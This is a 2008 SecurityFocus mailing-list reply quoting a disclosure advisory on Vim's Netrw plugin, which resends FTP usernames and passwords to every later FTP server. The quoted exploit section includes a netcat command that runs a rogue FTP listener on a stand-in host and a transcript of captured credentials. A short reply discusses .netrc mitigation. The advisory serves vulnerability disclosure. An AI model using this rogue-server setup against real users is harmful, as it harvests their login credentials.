Back to list
Re: Vim: Netrw: FTP User Name and Password Disclosure
Aug 12 2008 10:18PM
Tony Mechelynck (antoine mechelynck gmail com)
On 12/08/08 23:59, Jan MinÃ¡Å? wrote:
> Vim: Netrw: FTP User Name and Password Disclosure
> 1. SUMMARY
> Product : Vim -- Vi IMproved
> Versions : Tested with Vim 7.1.266, 7.2, autoload/netrw.vim v131, v109
> Impact : Credentials disclosure
> Wherefrom: Remote
> Original : http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html
> The Vim Netrw Plugin shares the FTP user name and password across all
> FTP sessions. Every time Vim makes a new FTP connection, it sends the
> user name and password of the previous FTP session to the FTP server.
> 2. BACKGROUND
> ``Vim is an almost compatible version of the UNIX editor Vi. Many new
> features have been added: multi-level undo, syntax highlighting,
> command line history, on-line help, spell checking, filename
> completion, block operations, etc.''
> -- Vim README.txt
> ``Netrw supports "transparent" editing of files on other machines
> using [...] vim ftp://hostname/path/to/file''
> ``Attempts to use ftp will prompt you for a user-id and a password.
> These will be saved in global variables g:netrw_uid and
> s:netrw_passwd; subsequent uses of ftp will re-use those two items
> to simplify the further use of ftp. However, if you need to use a
> different user id and/or password, you'll want to call NetUserPass()
> -- Netrw Reference Manual (``pi_netrw.txt'')
> 3. VULNERABILITY
> Once vim successfully connects to an FTP server using a user name and
> password credentials, it will re-use them in all subsequent FTP
> sessions, regardless of the domain name or TCP port.
> This behaviour is documented, although the documentation states the
> credentials are ``retained on a per-session basis''. Apparently the Vim
> session, not the FTP session:
> ``g:netrw_uid (ftp) user-id, retained on a per-session basis
> s:netrw_passwd (ftp) password, retained on a per-session basis''
> -- Netrw Reference Manual (``pi_netrw.txt'')
> Although FTP communication is not encrypted and therefore open to
> eavesdropping, if the access to the network is protected, a
> credentials-based access control is meaningful, and the credentials must
> be kept secret. For example, an FTP connection to a virtual Xen
> instance on the same physical machine is secure; so is an FTP session
> over a local ethernet segment secured against access from untrusted
> 4. EXPLOIT
> No adversary action on the part of the attacker is necessary, apart from
> keeping logs of the user name, password, source IP address, and other
> information about the FTP session.
> An example using netcat(1) for the rouge FTP server. There is another
> FTP server already running on the machine:
> # For the sake of this example, a custom hosts file. Note that
> # ftp.secure.example and ftp.rogue.example map to different IP
> # addresses.
> $ grep '\.example' /etc/hosts
> 127.0.1.1 ftp.secure.example
> 127.0.1.2 ftp.rogue.example
> # There is a stock FTP server running already
> $ netstat -plan | grep ftp
> tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 30623/vsftpd
> # Start the rogue FTP server
> $ printf '220\r\n331\r\n' > | netcat -lp 31337 ftp.rogue.example> credentials&
> # We use the ex command for clarity.
> $ ex ftp://ftp.secure.example/
> Enter username: rdancer
> Enter Password: *************
> Entering Ex mode. Type "visual" to go to Normal mode.
> :spl ftp://ftp.rogue.example:31337/
> "ftp://ftp.rogue.example:31337/" --No lines in buffer--
> $ cat credentials
> USER rdancer
> PASS z5vS24u76OrGM
> 5. COPYRIGHT
> This advisory is Copyright 2008 Jan Minar<rdancer (at) rdancer (dot) org [email concealed]>
> Copying welcome, under the Creative Commons ``Attribution-Share Alike''
> License http://creativecommons.org/licenses/by-sa/2.0/uk/
> Code included herein, and accompanying this advisory, may be copied
> according to the GNU General Public License version 2, or the Vim
> license. See the subdirectory ``licenses''.
> Various portions of the accompanying code may have been written by
> various parties. Those parties may hold copyright, and those portions
> may be copied according to their respective licenses.
> 6. HISTORY
> 2008-08-12 Sent to:<bugs (at) vim (dot) org [email concealed]>,<vim-dev (at) vim (dot) org [email concealed]>,
> <full-disclosure (at) lists.grok.org (dot) uk [email concealed]>,
> <bugtraq (at) securityfocus (dot) com [email concealed]>,
> Charles E Campbell, Jr (Vim Netrw Plugin Maintainer)
> <drchip (at) campbellfamily (dot) biz [email concealed]>
If the attacker has access to full logs of the FTP back-and-forth talk,
is it possible to keep the username and password secret?
Netrw mentions that if there exists a .netrc file (which ftp will use if
it is not world-readable, e.g. on Linux it needs 600 permissions) which
includes an applicable "machine" or "default" line, the user won't be
asked for a username and password (see ":help netrw-netrc"). I'm not
sure whether and to what degree this applies to non-Unix-like OSes such
Lysistrata had a good idea.
[ reply ]
Copyright 2010, SecurityFocus